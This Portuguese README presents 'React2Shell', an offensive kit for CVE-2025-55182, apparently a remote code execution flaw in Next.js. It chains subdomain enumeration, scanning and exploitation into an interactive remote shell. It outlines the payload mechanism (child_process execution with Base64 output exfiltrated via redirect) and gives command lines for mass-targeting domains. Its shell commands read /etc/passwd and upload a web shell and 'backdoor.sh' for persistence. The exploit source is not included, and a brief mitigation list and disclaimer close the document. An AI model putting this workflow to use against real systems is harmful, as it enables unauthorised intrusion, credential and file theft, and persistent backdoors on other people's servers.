🚨 React2Shell - Framework de Exploração CVE-2025-55182

Framework avançado de exploração para CVE-2025-55182 (Execução Remota de Código no Next.js)
Autor: opsecramdan
📚 Índice
- Visão Geral
- Detalhes da Vulnerabilidade
- Recursos
- Requisitos
- Instalação
- Uso
- Shell Interativo
- Arquivos de Saída
- Impacto
- Mitigação
- Limitações
- Aviso Legal
📌 Visão Geral
React2Shell é um framework de exploração para identificar e explorar a vulnerabilidade CVE-2025-55182 em aplicações baseadas em Next.js.
Esta ferramenta foi projetada como um kit ofensivo all-in-one que inclui:
- Enumeração de subdomínios
- Varredura de vulnerabilidades
- Motor de exploração
- Shell remoto interativo
🔍 Detalhes da Vulnerabilidade
- CVE ID: CVE-2025-55182
- Tipo: Execução Remota de Código (RCE)
- Plataforma: Next.js
- Vetor de Ataque: Requisição maliciosa multipart/form-data
- Impacto: Execução arbitrária de comandos
🧠 Causa Raiz
Esta vulnerabilidade explora o mecanismo interno do Next.js da seguinte forma:
- Injetar payload na requisição
- Chamar: process.mainModule.require('child_process')
- Executar comando do SO
- Codificar a saída em Base64
- Exfiltrar o resultado via redirect (
/login?a=)
⚙️ Recursos
🔎 Enumeração de Subdomínios
- Varredura DNS + HTTP
- Wordlist embutida
- Suporte a wordlist personalizada
- Salvamento automático de resultados
🧪 Scanner de Vulnerabilidades
- Teste em múltiplos endpoints:
/
/api
/api/auth
/_next
/admin
/dashboard
- Análise de cabeçalhos e respostas
- Redução de falsos positivos
💣 Motor de Exploração
- Geração automática de payloads
- Execução codificada em Base64
- Extração de saída baseada em redirect
🖥️ Shell Interativo
- Execução remota de comandos
- Sessão persistente
- Rastreamento de diretórios
📂 Operações de Arquivo
- Enviar arquivo
- Baixar arquivo
- Criar arquivo
👑 Modo Root
- Execução
sudo -i
- Simulação de escalonamento de privilégios
📦 Requisitos
Instale as dependências:
pip install requests dnspython
📥 Instalação
1. Clonar o Repositório
git clone https://github.com/yourusername/react2shell-cve-2025-55182.git
2. Entrar no diretório
cd react2shell-cve-2025-55182
3. Executar a ferramenta
python3 react2shell.py
🚀 Uso
🎯 Alvo Único
python3 react2shell.py -u https://target.com
Sem protocolo:
python3 react2shell.py -u target.com
📄 Múltiplos Alvos
python3 react2shell.py -f targets.txt
Exemplo de conteúdo do targets.txt:
https://target1.com
http://target2.com:3000
target3.com
🌐 Modo Completo (Recon + Scan + Exploit)
python3 react2shell.py -d example.com
Fluxo:
- Enumeração de subdomínios
- Varredura de vulnerabilidades
- Exploração (opcional)
📚 Wordlist Personalizada
python3 react2shell.py -d example.com -w wordlist.txt
🐞 Modo de Depuração
python3 react2shell.py -d example.com --debug
🖥️ Shell Interativo
Após a exploração bem-sucedida, você terá acesso ao shell.
Comandos Básicos
whoami
id
uname -a
pwd
ls -lah
⚙️ Comandos Especiais
📂 Enviar Arquivo
.upload shell.php /tmp/shell.php
📥 Baixar Arquivo
.download /etc/passwd
📄 Criar Arquivo
.create /tmp/test.txt
🔄 Exemplo de Fluxo de Trabalho
1. Escanear domínio
python3 react2shell.py -d example.com
2. Identificar o alvo vulnerável
3. Entrar no shell
whoami
4. Enviar payload
.upload backdoor.sh /tmp/backdoor.sh
📁 Arquivos de Saída
A ferramenta gerará:
- subdomains_*.txt
- vulnerable_*.txt
- output_*.txt
⚠️ Impacto
Se explorada com sucesso:
- Execução remota de comandos
- Acesso a arquivos sensíveis
- Envio de backdoor
- Acesso persistente
- Escalonamento de privilégios
🛡️ Mitigação
- Atualizar o Next.js para a versão mais recente
- Restringir endpoints internos
- Validar rigorosamente as entradas
- Usar WAF (OWASP CRS)
- Monitorar atividades anômalas
⚠️ Aviso Legal
Esta ferramenta foi criada apenas para:
- Aprendizado
- Pesquisa
- Testes de penetração autorizados
É proibido o uso para atividades ilegais.
⭐ Notas
Este projeto demonstra:
- Habilidades avançadas de exploração
- Compreensão dos componentes internos do Next.js
- Simulação de ataques do mundo real